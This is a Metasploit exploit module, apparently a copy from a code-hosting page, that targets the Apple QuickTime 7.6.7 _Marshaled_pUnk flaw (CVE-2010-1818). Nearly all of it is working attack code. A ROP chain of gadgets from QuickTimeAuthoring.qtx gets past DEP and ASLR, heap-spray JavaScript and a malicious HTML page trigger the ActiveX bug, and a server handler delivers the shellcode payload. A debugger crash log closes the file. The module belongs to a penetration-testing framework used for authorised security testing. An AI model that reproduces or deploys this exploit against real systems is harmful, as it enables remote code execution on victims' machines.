Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb
Views: 11783
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::HttpServer::HTML9include Msf::Exploit::Seh1011#include Msf::Exploit::Remote::BrowserAutopwn12#autopwn_info({13# :os_name => OperatingSystems::Match::WINDOWS,14# :ua_name => HttpClients::IE,15# :javascript => true,16# :rank => NormalRanking, # reliable memory corruption17#})1819def initialize(info = {})20super(update_info(info,21'Name' => 'Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution',22'Description' => %q{23This module exploits a memory trust issue in Apple QuickTime247.6.7. When processing a specially-crafted HTML page, the QuickTime ActiveX25control will treat a supplied parameter as a trusted pointer. It will26then use it as a COM-type pUnknown and lead to arbitrary code execution.2728This exploit utilizes a combination of heap spraying and the29QuickTimeAuthoring.qtx module to bypass DEP and ASLR. This module does not30opt-in to ASLR. As such, this module should be reliable on all Windows31versions.3233NOTE: The addresses may need to be adjusted for older versions of QuickTime.34},35'Author' =>36[37'Ruben Santemarta', # original discovery38'jduck' # Metasploit module39],40'License' => MSF_LICENSE,41'References' =>42[43[ 'CVE', '2010-1818' ],44[ 'OSVDB', '67705'],45[ 'URL', 'http://reversemode.com/index.php?option=com_content&task=view&id=69&Itemid=1' ]46],47'DefaultOptions' =>48{49'EXITFUNC' => 'thread',50'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',51},52'Payload' =>53{54'Space' => 384, # perhaps more?55'BadChars' => "", # none...56'DisableNops' => true,57'PrependEncoder' => Metasm::Shellcode.assemble(Metasm::Ia32.new, "mov esp,ebp").encode_string, # fix esp up58},59'Platform' => 'win',60'Targets' =>61[62# Tested OK:63#64# QT 7.6.6 + XP SP3 + IE865# QT 7.6.7 + XP SP3 + IE666#6768# @eromang reports it doesn't work on 7.6.569# - further investigation shows QuickTimeAuthoring.qtx changed / rop gadgets different7071# QuickTimeAuthoring.qtx 7.6.7 is compiled w/DYNAMIC_BASE, so win7 is :(7273[ 'Apple QuickTime Player 7.6.6 and 7.6.7 on Windows XP SP3',74{75'Ret' => 0x677a0000, # base of QuickTimeAuthoring.qtx76#'Ret' => 0x67780000, # base of QuickTimeAuthoring.qtx v7.6.577}78],79],80'Privileged' => false,81'DisclosureDate' => '2010-08-30',82'DefaultTarget' => 0))83end8485def on_request_uri(client, request)8687return if ((p = regenerate_payload(client)) == nil)8889print_status("Sending exploit HTML...")9091shellcode = Rex::Text.to_unescape(p.encoded)9293# We will spray to this address, hopefully94spray_target = 0x15220c209596# This is where our happy little dll is loaded97# 677a0000 679ce000 QuickTimeAuthoring C:\Program Files\QuickTime\QTSystem\QuickTimeAuthoring.qtx98rop_mod_base = target.ret99100sploit = [101spray_target - 8,102103# This first piece of code points the stack pointer to our data!104# NOTE: eax, ecx, and esi all point to our spray at this point.105rop_mod_base + 0x79c12, # xchg eax,esp / pop edi / pop esi / ret106107# The second one becomes the new program counter after stack flip.108rop_mod_base + 0x1e27, # pop ecx / ret109rop_mod_base + 0x170088, # the IAT addr for HeapCreate (becomes ecx)110111# We get the address of HeapCreate from the IAT here.112rop_mod_base + 0x10244, # mov eax,[ecx] / ret113114# Call HeapCreate to create the k-rad segment115rop_mod_base + 0x509e, # call eax1160x01040110, # flOptions (gets & with 0x40005)1170x01010101, # dwInitialSize1180x01010101, # dwMaximumSize119120# Don't bother calling HeapAlloc, just add 0x8000 to the Heap Base121122# Set ebx to our adjustment123rop_mod_base + 0x307a, # pop ebx / ret1240x8000, # becomes ebx125126# Adjust eax127rop_mod_base + 0xbfb5b, # add eax,ebx / ret128129# Save our buffer pointer off to this address130rop_mod_base + 0x1e27, # pop ecx / ret131rop_mod_base + 0x2062d4, # something writable132133# Write eax to the address134rop_mod_base + 0x8fd6, # mov [ecx], eax / ret135136# Now we must copy our real payload into the buffer137138# First, setup edi139rop_mod_base + 0x134fd5, # xchg eax,edi / ret140141# Get ESI from EDI (which is now in EAX)142rop_mod_base + 0x103ff8, # push eax / pop esi / pop ebx / ret1430x41414141, # scratch (becomes ebx)144145# Set ECX from the stack146rop_mod_base + 0x1e27, # pop ecx / ret1470x200 / 4, # dwords to copy :)148149# copy it!150rop_mod_base + 0x778d2, # rep movsd / pop edi / pop esi / ret1510x41414141, # scratch (becomes edi)1520x41414141, # scratch (becomes esi)153154# Re-load the buffer pointer address155rop_mod_base + 0x1e27, # pop ecx / ret156rop_mod_base + 0x2062d4, # something writable157158# And the pointer value itself159rop_mod_base + 0x10244, # mov eax,[ecx] / ret160161# Set ebx to our adjustment162rop_mod_base + 0x307a, # pop ebx / ret1630x42424242, # will be filled after array init164165# Adjust eax166rop_mod_base + 0xbfb5b, # add eax,ebx / ret167168# Jump!169rop_mod_base + 0x509e, # call eax170171# eh? Hopefull we didn't reach here.1720xdeadbeef173]174sploit[27] = 8 + (sploit.length * 4)175sploit = sploit.pack('V*')176sploit << p.encoded177sploit = Rex::Text.to_unescape(sploit)178179custom_js = <<-EOF180function Prepare()181{182var block = unescape("#{sploit}");183while(block.length < 0x200)184block += unescape("%u0000");185heap = new heapLib.ie(0x20000);186while(block.length < 0x80000)187block += block;188finalspray = block.substring(2, 0x80000 - 0x21);189for(var i = 0; i < 350; i++)190{191heap.alloc(finalspray);192}193}194195function start()196{197var obj = '<' + 'object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="0" height="0"'+'>'198+ '</'+ 'object>';199document.getElementById('stb').innerHTML = obj;200Prepare();201var targ = #{spray_target};202var obj = '<' + 'object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="0" height="0"' + '>'203+ '<' + 'PARAM name="_Marshaled_pUnk" value="' + targ + '"' + '/>'204+ '</'+ 'object>';205document.getElementById('xpl').innerHTML = obj;206}207EOF208209hl_js = heaplib(custom_js)210211content = <<-EOF212<html>213<head>214<script language="javascript">215#{hl_js}216</script>217</head>218<body onload="start()">219<div id="stb"></div>220<div id="xpl"></div>221</body>222</html>223EOF224225# ..226send_response(client, content, { 'Content-Type' => "text/html" })227228# Handle the payload229handler(client)230end231end232233234=begin235(7fc.a4): Access violation - code c0000005 (first chance)236First chance exceptions are reported before any exception handling.237This exception may be expected and handled.238eax=15220c20 ebx=00134ca8 ecx=15220c18 edx=00134b98 esi=15220c20 edi=00134bfc239eip=deadbe01 esp=00134b7c ebp=00134b90 iopl=0 nv up ei pl nz na po nc240cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202241deadbe01 ?? ???242=end243244245